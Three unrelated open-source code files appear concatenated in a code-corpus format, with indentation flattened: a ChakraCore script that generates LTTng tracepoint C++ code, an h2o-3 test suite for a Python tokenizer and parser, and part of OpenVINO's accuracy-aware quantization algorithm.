headerLines.append(")")
headerLines.append("#define T_TRACEPOINT_INSTANCE(name) \\")
headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
headerLines.append(" " + providerName + ",\\")
headerLines.append(" emptyTemplate,\\")
headerLines.append(" name,\\")
headerLines.append(" TP_ARGS()\\")
headerLines.append(")")
headerLines.append("")
for eventNode in events:
eventName = eventNode.getAttribute('symbol')
templateName = eventNode.getAttribute('template')
if not eventName:
raise Exception(eventNode + " event does not have a symbol")
if not templateName:
headerLines.append("T_TRACEPOINT_INSTANCE(" + eventName + ")")
continue
headerLines.append(templateName + "T_TRACEPOINT_INSTANCE(" + eventName + ")")
headerLines.append("#endif /* LTTNG_CHAKRA_H" + providerName + " */")
headerLines.append("#include <lttng/tracepoint-event.h>")
return "\n".join(headerLines)
def generateMethodBody(template, providerName, eventName):
    # Convert from ETW's Windows types to LTTng-compatible types
methodBody = [""]
functionSignature = template.signature
if not shouldPackTemplate(template):
invocation = ["do_tracepoint(" + providerName, eventName]
for paramName in functionSignature.paramList:
functionParam = functionSignature.getParam(paramName)
wintypeName = functionParam.winType
winCount = functionParam.count
ctf_type = None
if functionParam.outType:
ctf_type = ctfDataTypeMapping.get(functionParam.outType)
else:
                ctf_type = ctfDataTypeMapping.get(winCount)
if not ctf_type:
ctf_type = ctfDataTypeMapping[wintypeName]
if ctf_type == "ctf_string" and wintypeName == "win:UnicodeString":
# Convert wchar unicode string to utf8
if functionParam.length:
methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ", " + functionParam.length + ");")
else:
methodBody.append("utf8::WideToNarrow " + paramName + "_converter(" + paramName + ");")
invocation.append(paramName + "_converter")
# elif ctf_type == "ctf_sequence" or wintypeName == "win:Pointer":
elif wintypeName == "win:Pointer":
invocation.append("(" + lttngDataTypeMapping[wintypeName] + lttngDataTypeMapping[winCount] + ")" + paramName)
else:
invocation.append(paramName)
methodBody.append(",\n ".join(invocation) + ");")
else:
# Packing results into buffer
methodBody.append("char stackBuffer[" + str(template.estimatedSize) + "];")
methodBody.append("char *buffer = stackBuffer;")
methodBody.append("int offset = 0;")
methodBody.append("int size = " + str(template.estimatedSize) + ";")
methodBody.append("bool fixedBuffer = true;")
methodBody.append("bool success = true;")
for paramName in functionSignature.paramList:
functionParameter = functionSignature.getParam(paramName)
if paramName in template.structCounts:
size = "(unsigned int)" + paramName + "_ElementSize * (unsigned int)" + template.structCounts[paramName]
methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
elif paramName in template.arrayCounts:
size = "sizeof(" + lttngDataTypeMapping[functionParameter.winType] + ") * (unsigned int)" + template.arrayCounts[paramName]
methodBody.append("success &= WriteToBuffer((const char *)" + paramName + ", " + size + ", buffer, offset, size, fixedBuffer);")
elif functionParameter.winType == "win:GUID":
methodBody.append("success &= WriteToBuffer(*" + paramName + ", buffer, offset, size, fixedBuffer);")
else:
methodBody.append("success &= WriteToBuffer(" + paramName + ", buffer, offset, size, fixedBuffer);")
methodBody.append("if (!success)")
methodBody.append("{")
methodBody.append(" if (!fixedBuffer) delete[] buffer;")
methodBody.append(" return ERROR_WRITE_FAULT;")
methodBody.append("}")
methodBody.append("do_tracepoint(" + providerName + ", " + eventName + ", offset, buffer);")
methodBody.append("if (!fixedBuffer) delete[] buffer;")
return "\n ".join(methodBody) + "\n"
def generateMethodSignature(template):
if not template:
return ""
functionSignature = template.signature
lineFunctionPrototype = []
for paramName in functionSignature.paramList:
functionParameter = functionSignature.getParam(paramName)
wintypeName = functionParameter.winType
mappedType = palDataTypeMapping[wintypeName]
winCount = functionParameter.count
mappedCount = palDataTypeMapping[winCount]
if paramName in template.structCounts:
lineFunctionPrototype.append(" int " + paramName + "_ElementSize")
# lineFunctionPrototype.append("// " + wintypeName + " " + str(functionParameter.length))
lineFunctionPrototype.append(
" " + mappedType
+ (mappedCount if mappedCount != " " else "*" if functionParameter.length and not wintypeName in ["win:UnicodeString", "win:AnsiString"] else "")
+ " "
+ functionParameter.name)
return ",\n".join(lineFunctionPrototype)
def generateLttngTracepointProvider(providerName, lttngHeader, templates, events):
    providerLines = []
providerLines.append("#define TRACEPOINT_DEFINE")
providerLines.append("#ifndef CHAKRA_STATIC_LIBRARY")
providerLines.append("#define TRACEPOINT_PROBE_DYNAMIC_LINKAGE")
providerLines.append("#endif")
providerLines.append("#include \"stdlib.h\"")
providerLines.append("#include \"Common.h\"")
providerLines.append("#include \"Codex/Utf8Helper.h\"")
providerLines.append("#include \"" + lttngHeader + "\"\n\n")
providerLines.append("#ifndef tracepoint_enabled")
providerLines.append("#define tracepoint_enabled(provider, name) 1")
providerLines.append("#define do_tracepoint tracepoint")
providerLines.append("#endif")
providerLines.append("""
bool ResizeBuffer(char *&buffer, int&size, int currentLength, int newSize, bool &fixedBuffer)
{
newSize *= 1.5;
_ASSERTE(newSize > size); // Check for overflow
if (newSize < 32)
{
newSize = 32;
}
char *newBuffer = new char[newSize];
memcpy(newBuffer, buffer, currentLength);
if (!fixedBuffer)
{
delete[] buffer;
}
buffer = newBuffer;
size = newSize;
fixedBuffer = false;
return true;
}
bool WriteToBuffer(const char * src, int len, char *&buffer, int &offset, int &size, bool &fixedBuffer)
{
if (!src)
{
return true;
}
if (offset + len > size)
{
if (!ResizeBuffer(buffer, size, offset, size+len, fixedBuffer))
{
return false;
}
}
memcpy(buffer + offset, src, len);
offset += len;
return true;
}
template <typename T>
bool WriteToBuffer(const T &value, char *&buffer, int&offset, int&size, bool &fixedBuffer)
{
if (sizeof(T) + offset > size)
{
if (!ResizeBuffer(buffer, size, offset, size + sizeof(T), fixedBuffer))
{
return false;
}
}
*(T *)(buffer + offset) = value;
offset += sizeof(T);
return true;
}
""")
for eventNode in events:
eventName = eventNode.getAttribute('symbol')
templateName = eventNode.getAttribute('template')
providerLines.append("extern \"C\" bool EventXplatEnabled%s(){ return tracepoint_enabled(%s, %s);}"
% (eventName, providerName, eventName))
providerLines.append("")
template = None
if templateName:
template = templates[templateName]
providerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName + "(")
providerLines.append(generateMethodSignature(template))
providerLines.append(")")
providerLines.append("{")
providerLines.append(" if (!EventXplatEnabled" + eventName + "())")
providerLines.append(" return ERROR_SUCCESS;")
if template:
providerLines.append(generateMethodBody(template, providerName, eventName))
else:
providerLines.append(" do_tracepoint(" + providerName + ", " + eventName +");")
providerLines.append("")
providerLines.append(" return ERROR_SUCCESS;")
providerLines.append("}")
providerLines.append("")
return "\n".join(providerLines)
def generateEtwHeader(templates, events):
headerLines = []
headerLines.append("#include \"pal.h\"")
headerLines.append("")
for event in events:
eventName = event.getAttribute('symbol')
templateName = event.getAttribute('template')
template = None
if templateName:
template = templates[templateName]
callArgs = []
if template:
functionSignature = template.signature
for param in functionSignature.paramList:
if param in template.structCounts:
callArgs.append(param + "_ElementSize")
callArgs.append(param)
headerLines.append("extern \"C\" bool EventXplatEnabled" + eventName +"();")
headerLines.append("inline bool EventEnabled" + eventName +"() { return EventXplatEnabled" + eventName + "();}")
headerLines.append("")
headerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName +" (")
headerLines.append(generateMethodSignature(template))
headerLines.append(");")
headerLines.append("inline unsigned long EventWrite" + eventName + "(")
headerLines.append(generateMethodSignature(template))
headerLines.append(")")
headerLines.append("{")
headerLines.append(" return FireEtXplat" + eventName + "(" + ", ".join(callArgs) + ");")
headerLines.append("}")
headerLines.append("")
return "\n".join(headerLines)
def generateCmakeFile(providerName):
cmakeLines = []
cmakeLines.append("project(Chakra.LTTng)")
cmakeLines.append("")
cmakeLines.append("add_compile_options(-fPIC)")
cmakeLines.append("")
cmakeLines.append("add_library (Chakra.LTTng OBJECT")
cmakeLines.append(" eventprovider" + providerName + ".cpp")
cmakeLines.append(" tracepointprovider" + providerName + ".cpp")
cmakeLines.append(")")
return "\n".join(cmakeLines)
def generateLttngFiles(manifest, providerDirectory):
import os
tree = DOM.parse(manifest)
if not os.path.exists(providerDirectory):
os.makedirs(providerDirectory)
if not os.path.exists(providerDirectory + "/lttng"):
os.makedirs(providerDirectory + "/lttng")
for providerNode in tree.getElementsByTagName("provider"):
providerName = providerNode.getAttribute("name")
providerName = providerName.replace("Microsoft-", "")
providerNameFile = providerName.lower()
lttngEventHeaderShortName = "tp" + providerNameFile + ".h"
lttngEventHeaderPath = providerDirectory + "/lttng/" + lttngEventHeaderShortName
lttngEventProvider = providerDirectory + "/lttng/eventprovider" + providerNameFile + ".cpp"
lttngEventProviderTrace = providerDirectory + "/lttng/tracepointprovider" + providerNameFile + ".cpp"
lttngEtwHeaderFile = providerDirectory + "/lttng/" + providerNameFile + "Etw.h"
lttngCmakeFile = providerDirectory + "/lttng/CMakeLists.txt"
lttngHeader = open(lttngEventHeaderPath, "w")
lttngImplementation = open(lttngEventProvider, "w")
lttngTraceImplementation = open(lttngEventProviderTrace, "w")
lttngEtwHeader = open(lttngEtwHeaderFile, "w")
lttngCmake = open(lttngCmakeFile, "w")
# Create the lttng implementation
lttngTraceImplementation.write("#define TRACEPOINT_CREATE_PROBES\n")
lttngTraceImplementation.write("#include \"./"+lttngEventHeaderShortName+"\"\n")
lttngTraceImplementation.close()
# Create the lttng header
templateNodes = providerNode.getElementsByTagName('template')
eventNodes = providerNode.getElementsByTagName('event')
allTemplates = parseTemplateNodes(templateNodes)
lttngHeader.write(generateLttngHeader(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
        lttngHeader.close()
        lttngImplementation.write(generateLttngTracepointProvider(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
        lttngImplementation.close()
lttngEtwHeader.write(generateEtwHeader(allTemplates, eventNodes))
lttngEtwHeader.close()
# Note: This in particular assumes that there is only one ETW provider
lttngCmake.write(generateCmakeFile(providerNameFile))
lttngCmake.close()
if __name__ == '__main__':
import argparse
import sys
    parser = argparse.ArgumentParser(description="Generates the code required to instrument the LTTng logging mechanism")
required = parser.add_argument_group('required arguments')
required.add_argument('--man', type=str, required=True,
                                    help='full path to the manifest containing the description of events')
required.add_argument('--intermediate', type=str, required=True,
help='full path to eventprovider intermediate directory')
args, unknown = parser.parse_known_args(sys.argv[1:])
if unknown:
print('Unknown argument(s): ', ', '.join(unknown))
sys.exit(1)
generateLttngFiles(args.man, args.intermediate)
sys.exit(0)
|
h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 6,098 | 30351 | <reponame>vishalbelsare/h2o-3
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test case for pyparser."""
from __future__ import division, print_function
import os
import re
import textwrap
import tokenize
from future.builtins import open
import pyparser
def _make_tuple(op):
return lambda x: (op, x)
NL = tokenize.NL
NEWLINE = tokenize.NEWLINE
NAME = _make_tuple(tokenize.NAME)
OP = _make_tuple(tokenize.OP)
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
COMMENT = tokenize.COMMENT
STRING = tokenize.STRING
NUMBER = tokenize.NUMBER
END = tokenize.ENDMARKER
token_names = {NL: "NL", NEWLINE: "NEWLINE", INDENT: "INDENT", COMMENT: "COMMENT", DEDENT: "DEDENT",
STRING: "STRING", NUMBER: "NUMBER", END: "END", tokenize.OP: "OP", tokenize.NAME: "NAME"}
Ws = pyparser.Whitespace
Comment = pyparser.Comment
Comment_banner = (pyparser.Comment, "banner")
Comment_code = (pyparser.Comment, "code")
Docstring = pyparser.Docstring
Import_future = (pyparser.ImportBlock, "future")
Import_stdlib = (pyparser.ImportBlock, "stdlib")
Import_3rdpty = (pyparser.ImportBlock, "third-party")
Import_1stpty = (pyparser.ImportBlock, "first-party")
Expression = pyparser.Expression
Function = (pyparser.Callable, "def")
Class = (pyparser.Callable, "class")
def assert_same_code(code1, code2):
"""Verify whether 2 code fragments are identical, and if not print an error message."""
regex = re.compile(r"\s+\\$", re.M)
code1 = re.sub(regex, r"\\", code1)
code2 = re.sub(regex, r"\\", code2)
if code2 != code1:
print()
lines_code1 = code1.splitlines()
lines_code2 = code2.splitlines()
n_diffs = 0
for i in range(len(lines_code1)):
old_line = lines_code1[i]
new_line = lines_code2[i] if i < len(lines_code2) else ""
if old_line != new_line:
print("%3d - %s" % (i + 1, old_line))
print("%3d + %s" % (i + 1, new_line))
n_diffs += 1
if n_diffs == 5: break
raise AssertionError("Unparsed code1 does not match the original.")
def test_tokenization():
"""
Test function for ``pyparser._normalize_tokens()``.
Even though this function is private, it is extremely important to verify that it behaves correctly. In
particular, we want to check that it does not break the round-trip guarantee of the tokenizer, and that it
fixes all the problems that the original tokenizer has.
"""
# Helper functions
def _parse_to_tokens(text):
"""Parse text into tokens and then normalize them."""
gen = iter(text.splitlines(True)) # True = keep newlines
readline = gen.next if hasattr(gen, "next") else gen.__next__
return pyparser._tokenize(readline)
def _unparse_tokens(tokens):
"""Convert tokens back into the source code."""
return tokenize.untokenize(t.token for t in tokens)
def _assert_tokens(tokens, target):
"""Check that the tokens list corresponds to the target provided."""
for i in range(len(tokens)):
assert i < len(target), "Token %d %r not expected" % (i, tokens[i])
tok = tokens[i]
trg = target[i]
valid = False
if isinstance(trg, int):
if tok.op == trg: valid = True
name = token_names[trg]
elif isinstance(trg, tuple) and len(trg) == 2:
if tok.op == trg[0] and tok.str == trg[1]: valid = True
name = "%s(%s)" % (token_names[trg[0]], trg[1])
else:
assert False, "Unknown target: %r" % trg
if not valid:
assert False, "Mismatched token %d: found %r, should be %r" % (i, tok, name)
assert len(target) == len(tokens), "Expected too many tokens: %d vs %d" % (len(tokens), len(target))
def check_code(code, expected_tokens=None, filename=None):
"""Test parsing of the given piece of code."""
code = textwrap.dedent(code)
if filename:
print("Testing tokenization of %s:" % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing tokenization %d:" % check_code.index, end=" ")
tokens = _parse_to_tokens(code)
try:
try:
unparsed = _unparse_tokens(tokens)
except ValueError as e:
raise AssertionError("Cannot unparse tokens: %s" % e)
assert_same_code(code, unparsed)
if expected_tokens:
_assert_tokens(tokens, expected_tokens)
print("ok")
except AssertionError as e:
print(u"Error: %s" % e)
print(u"Original code fragment:\n" + code)
print("Tokens:")
for i, tok in enumerate(tokens):
print("%3d %r" % (i, tok))
raise
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, COMMENT, NL, DEDENT, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, COMMENT, NL, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, COMMENT, NL, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
def func():
# function
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def func(): # function
# hanging comment
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), COMMENT, NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def foo():
pass
#comment
def bar():
pass
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, NL, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def hello():
print("hello")
""", [NL, NAME("def"), NAME("hello"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NL, NL,
NAME("print"), OP("("), STRING, OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo:
def foo(self):
pass
def bar(self):
return
""", [NL, NAME("class"), NAME("Foo"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("foo"), OP("("),
NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, NAME("def"),
NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("return"), NEWLINE, DEDENT,
DEDENT, END])
check_code("""
def foo():
# Attempt to create the output directory
try:
os.makedirs(destdir)
except OSError as e:
raise
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("try"),
OP(":"), NEWLINE, INDENT, NAME("os"), OP("."), NAME("makedirs"), OP("("), NAME("destdir"), OP(")"),
NEWLINE, DEDENT, NAME("except"), NAME("OSError"), NAME("as"), NAME("e"), OP(":"), NEWLINE, INDENT,
NAME("raise"), NEWLINE, DEDENT, DEDENT, END])
check_code("""
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
print("I'm done.")
""", [NL, NAME("if"), NAME("PY2"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("unicode"), OP("("), OP(")"),
OP(":"), NEWLINE, INDENT, NAME("raise"), NAME("RuntimeError"), COMMENT, NEWLINE, COMMENT, NL,
DEDENT, DEDENT, NL, NAME("handler"), OP("="), NAME("lambda"), OP(":"), NAME("None"), COMMENT, NEWLINE,
COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, END])
check_code("""
def test3():
x = 1
# bad
print(x)
""", [NL, NAME("def"), NAME("test3"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("x"), OP("="),
NUMBER, NEWLINE, COMMENT, NL, NAME("print"), OP("("), NAME("x"), OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo(object):
#-------------
def bar(self):
if True:
pass
# Originally the DEDENTs are all the way down near the decorator. Here we're testing how they'd travel
# all the way up across multiple comments.
# comment 3
# commmmmmmment 4
@decorator
""", [NL, NAME("class"), NAME("Foo"), OP("("), NAME("object"), OP(")"), OP(":"), NEWLINE, INDENT,
COMMENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, DEDENT, DEDENT, NL, COMMENT, NL, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT,
NL, OP("@"), NAME("decorator"), NEWLINE, END])
    # Really, one should avoid code like this... It won't break the normalizer, but it may create problems
    # downstream.
check_code("""
if True:
if False:
# INDENT will be inserted before this comment
raise
# DEDENT will be after this comment
else:
praise()
""", [NL, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("False"), OP(":"), NEWLINE,
INDENT, COMMENT, NL, NAME("raise"), NEWLINE, COMMENT, NL, DEDENT, NAME("else"), OP(":"), NEWLINE,
INDENT, NAME("praise"), OP("("), OP(")"), NEWLINE, DEDENT, DEDENT, END])
for directory in [".", "../../h2o-py/h2o", "../../h2o-py/tests"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
def test_pyparser():
"""Test case: general parsing."""
def _check_blocks(actual, expected):
assert actual, "No parse results"
for i in range(len(actual)):
assert i < len(expected), "Unexpected block %d:\n%r" % (i, actual[i])
valid = False
if isinstance(expected[i], type):
if isinstance(actual[i], expected[i]): valid = True
elif isinstance(expected[i], tuple):
if isinstance(actual[i], expected[i][0]) and actual[i].type == expected[i][1]: valid = True
if not valid:
assert False, "Invalid block: expected %r, got %r" % (expected[i], actual[i])
def check_code(code, blocks=None, filename=None):
code = textwrap.dedent(code)
if not code.endswith("\n"): code += "\n"
if filename:
print("Testing file %s..." % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing code fragment %d..." % check_code.index, end=" ")
preparsed = None
parsed = None
unparsed = None
try:
preparsed = pyparser.parse_text(code)
parsed = preparsed.parse(2)
try:
unparsed = parsed.unparse()
except ValueError as e:
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise AssertionError("Cannot unparse code: %s" % e)
assert_same_code(code, unparsed)
if blocks:
_check_blocks(parsed.parsed, blocks)
print("ok")
except AssertionError as e:
print()
print(u"Error: " + str(e))
print(u"Original code fragment:\n" + code)
if unparsed: print(u"Unparsed code:\n" + unparsed)
if parsed:
print(parsed)
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise
except Exception as e:
print()
print(u"Error: " + str(e))
if preparsed:
print("Preparsed tokens:")
for i, tok in enumerate(preparsed.tokens):
print("%4d %r" % (i, tok))
else:
print("Initial parsing has failed...")
raise
check_code("""
# -*- encoding: utf-8 -*-
# copyright: 2016 h2o.ai
\"\"\"
A code example.
It's not supposed to be functional, or even functionable.
\"\"\"
from __future__ import braces, antigravity
# Standard library imports
import sys
import time
import this
import h2o
from h2o import H2OFrame, init
from . import *
# Do some initalization for legacy python versions
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
class Foo(object):
#------ Public -------------------------------------------------------------
def bar(self):
pass
# def foo():
# print(1)
#
# print(2)
# comment 2
@decorated(
1, 2, (3))
@dddd
def bar():
# be
# happy
print("bar!")
# bye""", [Ws, Comment, Docstring, Import_future, Ws, Import_stdlib, Ws, Import_1stpty, Ws, Expression,
Ws, Expression, Ws, Comment_banner, Ws, Class, Ws, Comment_code, Ws, Function, Comment, Ws])
for directory in [".", "../../h2o-py", "../../py"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
# test_tokenization()
test_pyparser()
|
tools/pot/openvino/tools/pot/algorithms/quantization/accuracy_aware_common/algorithm.py | chccc1994/openvino | 2,406 | 30352 | <reponame>chccc1994/openvino
# Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import random
from copy import deepcopy
from sys import maxsize
import numpy as np
from .utils import create_metric_config, is_preset_performance, \
get_mixed_preset_config, evaluate_model, get_num_of_quantized_ops
from ..utils import load_hardware_config
from ...algorithm import Algorithm
from ...algorithm_selector import COMPRESSION_ALGORITHMS
from ....algorithms.quantization import utils as eu
from ....graph import node_utils as nu
from ....graph.model_utils import save_model, get_nodes_by_type
from ....graph.transformer import GraphTransformer
from ....samplers.creator import create_sampler
from ....statistics.statistics import TensorStatistic
from ....utils.logger import get_logger
from ....utils.telemetry import send_event
logger = get_logger(__name__)
# pylint: disable=R0912
@COMPRESSION_ALGORITHMS.register('AccuracyAwareCommon')
class AccuracyAwareCommon(Algorithm):
name = 'AccuracyAwareCommon'
def __init__(self, config, engine):
super().__init__(config, engine)
# configure default parameters
default_config = {
'metric_subset_ratio': 0.5,
'ranking_subset_size': config.get('ranking_subset_size', min(len(engine.data_loader), 300)),
'max_iter_num': maxsize,
'maximal_drop': 0.01,
'drop_type': 'absolute',
'use_prev_if_drop_increase': True,
'base_algorithm': 'DefaultQuantization',
'annotation_free': False,
'tune_hyperparams': False,
'annotation_conf_threshold': 0.6,
'convert_to_mixed_preset': False
}
for setting in default_config:
if setting not in self._config:
self._config[setting] = default_config[setting]
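        # Illustrative only (hypothetical user settings): a config such as
        #   {"maximal_drop": 0.005, "drop_type": "relative", "ranking_subset_size": 300}
        # would override the corresponding defaults above.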
self._config.convert_to_mixed_preset = self._config.convert_to_mixed_preset and \
is_preset_performance(self._config)
save_dir = self._config.get('exec_log_dir', os.path.curdir)
self._config.intermediate_log_dir = os.path.join(save_dir, 'accuracy_aware_intermediate')
self._engine.calculate_metrics = True
# Create initial quantization algorithms
self._quantization_algo = self._create_quantization_algo(self._config, 'AAQuantizationAlgorithm', self._engine)
self._preset_conversion_algo = self._create_quantization_algo(get_mixed_preset_config(self._config),
'AAConversionAlgorithm', self._engine)
self._grid_search_algo = COMPRESSION_ALGORITHMS.get('ParamsGridSearchAlgorithm')(self._config, engine)
self._grid_search_algo.default_algo = self._quantization_algo
# Configure metrics
self._metrics_config = create_metric_config(self._engine, self._config)
self._baseline_metric = {metric.name: metric.baseline_value
for metric in self._config.metrics
if metric.name in self._metrics_config} \
if self._config.metrics and \
all('baseline_value' in metric.keys() for metric in self._config.metrics) \
else {}
self._max_drop_by_name = {}
self._original_per_sample_metrics = None
self._output_node_name, self._stats_layout = None, None
self._quantized_layers_num = 0
self._dataset_size = len(self._engine.data_loader)
metric_subset_size = int(self._dataset_size * self._config.metric_subset_ratio)
self._diff_subset_indices = sorted(random.sample(range(self._dataset_size), metric_subset_size)) \
if metric_subset_size < self._dataset_size and self._baseline_metric \
else list(range(self._dataset_size))
self._graph_transformer = GraphTransformer(load_hardware_config(self._config))
self.default_steps_size = 0.005
self.total_exec_steps = self._config.get('stat_subset_size', self._dataset_size)
self._quantization_algo.default_steps_size = self.default_steps_size
if self._config.convert_to_mixed_preset:
self._preset_conversion_algo.default_steps_size = self.default_steps_size
self._stats_collector = None
self._precision_change_to = 'floating-point'
self._need_to_change_scope = True
self._change_conditions = None
self._exclude_bad_nodes = False
@property
def change_original_model(self):
return True
def register_statistics(self, model, stats_collector):
self._stats_collector = stats_collector
self._quantization_algo.register_statistics(model, stats_collector)
if self._config.convert_to_mixed_preset:
self._preset_conversion_algo.register_statistics(model, stats_collector)
if self._config.tune_hyperparams:
self._grid_search_algo.register_statistics(model, stats_collector)
def run(self, model):
""" this function applies the accuracy aware
quantization scope search algorithm
:param model: model to apply algo
:return model with modified quantization scope to match
required accuracy values
"""
if not self._metrics_config:
logger.info('Could not find the required metrics for optimization in the engine. '
'Stop AccuracyAware optimization. '
'Available metrics: %s.', ', '.join(self._engine.get_metrics_attributes()))
logger.update_progress(self.total_exec_steps)
return model
# configure stats layout to collect raw output
# to calculate persample difference for special metrics
self._output_node_name = nu.get_node_input(
model.get_final_output_nodes()[0], 0).name # gets first output node
for metric_config in self._metrics_config.values():
if metric_config.persample.is_special:
self._stats_layout = {self._output_node_name: {'output_logits': TensorStatistic(lambda a: a)}}
break
self._request_alt_statistics(model)
print_progress = logger.progress_bar_disabled
if not self._baseline_metric or self._config.annotation_free:
# collect predictions of original model
if self._config.annotation_free:
self._engine.dump_prediction_to_annotation = True
self._engine.annotation_conf_threshold = self._config.annotation_conf_threshold
self._baseline_metric, self._original_per_sample_metrics = self._collect_baseline(model, print_progress)
logger.info('Baseline metrics: %s', self._baseline_metric)
# update dataset info
if self._config.annotation_free:
self._dataset_size = len(self._engine.data_loader)
self._diff_subset_indices = list(range(self._dataset_size))
# configure values of metrics maximum drop
max_drop = self._config.maximal_drop
if self._config.drop_type == 'relative':
self._max_drop_by_name = {name: value * max_drop for name, value in self._baseline_metric.items()}
else:
self._max_drop_by_name = {name: max_drop for name, value in self._baseline_metric.items()}
# quantize model
quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._quantize_model,
print_progress=print_progress)
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
default_quantization_config = self._quantization_algo.config
# change quantization preset of the model if possible
if self._config.convert_to_mixed_preset:
quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._convert_model_to_mixed_preset,
print_progress=print_progress)
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
default_quantization_config = self._preset_conversion_algo.config
if not self._original_per_sample_metrics:
_, self._original_per_sample_metrics = \
self._evaluate_model(model=model, subset_indices=self._diff_subset_indices)
# change quantization parameters of the model
if self._config.tune_hyperparams:
worst_ranking_subset = self._create_hardest_ranking_subset(quantized_metrics_per_sample)
self._grid_search_algo.update_config(default_quantization_config)
self._grid_search_algo.set_subset_and_metric(worst_ranking_subset,
self._metrics_config)
self._engine.allow_pairwise_subset = True
updated_quantized_model, updated_metrics_accuracy_drop, updated_quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._search_optimal_parameters,
print_progress=print_progress)
default_mean_drop = np.mean([value for name, value in metrics_accuracy_drop.items()])
updated_mean_drop = np.mean([value for name, value in updated_metrics_accuracy_drop.items()])
if updated_mean_drop < default_mean_drop:
logger.info('Applying the best configuration')
quantized_model = updated_quantized_model
metrics_accuracy_drop = updated_metrics_accuracy_drop
quantized_metrics_per_sample = updated_quantized_metrics_per_sample
self._engine.allow_pairwise_subset = False
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
        # delete the original model to reduce memory consumption, which is otherwise too high
        # because _change_quantization_scope(..) will allocate one more model
del model
if self._need_to_change_scope:
return self._change_quantization_scope(quantized_model,
metrics_accuracy_drop,
quantized_metrics_per_sample)
